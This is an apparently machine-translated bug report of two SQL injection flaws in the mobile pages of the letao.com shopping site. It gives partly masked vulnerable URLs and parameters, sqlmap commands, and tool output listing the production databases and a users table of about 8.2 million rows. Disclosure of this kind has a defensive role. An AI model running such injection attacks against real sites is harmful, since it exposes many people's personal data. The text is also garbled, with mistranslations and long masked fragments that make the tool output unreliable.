There are two injection vulnerabilities in the main site of retao, involving million user information.
233 when someone else's homepage is displayed, he will definitely search for the homepage.
1. root @ Hacker ~] # Sqlmap. py-u"
Mask Region
1.http://**.**.**/wap/pay/address.aspxuuid145 3276304&add=&addressid=&aid=110304*&c=&cid=GPJsD2Gh&form=0&op=newadd&pid=110000& tid=0
"& Aid = injection exists
2.
Mask Region
1.http://**.**.**/wap/app_download.aspxop=bra nd&bid=23<session=uyse012it3xrpjxi1z6x43f1
The bid = parameter is injected.
Review completed this time
E:\PHPnow-1.5.6.4237493736\htdocs\proxy\sqlmapproject-sqlmap-0.9-4439-gaee47d3\sqlmapproject-sqlmap-aee47d3>sqlmap.py -u ".
Mask Region
1.http://**.**.**/wap/app_download_*****;ltsession=uyse0*****
"
_
___ | _____ ___ {1.0-dev-nongit-201512180a8c}
| _-|. |. '|. |
| ___ | _ |__, | _ |
| _ | Http://sqlmap.org
[!] Legal disclaal: Usage of sqlmap for attacking targets without prior mutual
Consent is illegal. It is the end user's responsibility to obey all applicable
Local, state and federal laws. Developers assume no liability and are not respon
Sible for any misuse or damage caused by this program
[*] Starting at 10:32:10
[10:32:10] [CRITICAL] invalid target URL
[*] Shutting down at 10:32:10
Mask Region
*****xy\sqlmapproject-sq**********lmap-aee**********xy\sqlmapproject-sq*****1.://**.**.**//www.letao.com/wap/app_download_*****session=uyse012it*****
_
Mask Region
*****{1.0-dev-nong********** | .**********_|_|_|*****1.://**.**.**//sqlmap.org_*************** for attacking targ**********'s responsibili**********pers assume no liab**********amage caused ********************g at 1********************L] invalid********************down at******************************xy\sqlmapproject-sq*****2.://**.**.**//www.letao.com/wap/app_download._*****ession=uyse012it3********** ********** {1.0-dev-non********** | .**********_|_|_|*****3.://**.**.**//sqlmap.org_*************** for attacking targ**********'s responsibili**********pers assume no liab**********amage caused ********************g at 1********************9;) found in option ********** [Y/n********** DBMS 'micros********** connection t*****4.://**.**.**//www.letao.com:80/wap/&*****Y/n**********get is protected by********************cted that the targe**********F/IPS**********detect backend **********o 10 seconds (i.e. &********** to detect backend**********DS/IPS product **********jection point(s)**********-**********: #1***********lean-ba**********d blind - WHER**********p/app_download.aspx?**********uyse012it3xr**********-**********end DBMS is Mi**********stem: Window********** 4.0.30319, ASP.NE**********osoft SQL **********o text files under &**********p\output\www.********************down at******************************xy\sqlmapproject-sq*****5.://**.**.**//www.letao.com/wap/app_download._*****sion=uyse012it3xrp********** ********** {1.0-dev-non********** | .**********_|_|_|*****6.://**.**.**//sqlmap.org_*************** for attacking targ**********'s responsibili**********pers assume no liab**********amage caused ********************g at 1********************9;) found in option ********** [Y/n********** DBMS 'micros********** connection t**********get is protected by********************jection point(s)**********-**********: #1***********lean-ba**********d blind - WHER**********p/app_download.aspx?**********n=uyse012it*****
---
[10:32:51] [INFO] the back-end DBMS is Microsoft SQL Server
Web server operating system: Windows 2008 R2 or 7
Web application technology: ASP. NET 4.0.30319, Microsoft IIS 7.5, ASP. NET
Back-end DBMS: Microsoft SQL Server 2008
[10:32:51] [INFO] fetching database names
[10:32:51] [INFO] fetching number of databases
[10:32:51] [INFO] resumed: 11
[10:32:51] [INFO] resumed: ASPState
[10:32:51] [INFO] resumed: distribution
[10:32:51] [INFO] resumed: ImagesRecord
[10:32:51] [INFO] resumed: letao_accounting
[10:32:51] [INFO] resumed: Letao_Web_Log
[10:32:51] [INFO] resumed: letaoerp
[10:32:51] [INFO] resumed: master
[10:32:51] [INFO] resumed: model
[10:32:51] [INFO] resumed: msdb
[10:32:51] [INFO] resumed: tempdb
[10:32:51] [INFO] resumed: test2_letaoerp
Available databases [11]:
[*] ASPState
[*] Distribution
[*] ImagesRecord
[*] Letao_accounting
[*] Letao_Web_Log
[*] Letaoerp
[*] Master
[*] Model
[*] Msdb
[*] Tempdb
[*] Test2_letaoerp
[10:32:51] [INFO] fetched data logged to text files under 'C: \ Documents ents and Sett
Ings \ Administrator \. sqlmap \ output \ www.letao.com'
[*] Shutting down at 10:32:51
Million data
Database: letaoerp +-----------+---------+ | Table | Entries | +-----------+---------+ | dbo.users | 8249890 | +-----------+---------+ [00:12:50] [INFO] fetched data logged to text files under ings\Administrator\.sqlmap\output\www.letao.com
Solution:
Do you have Daniel?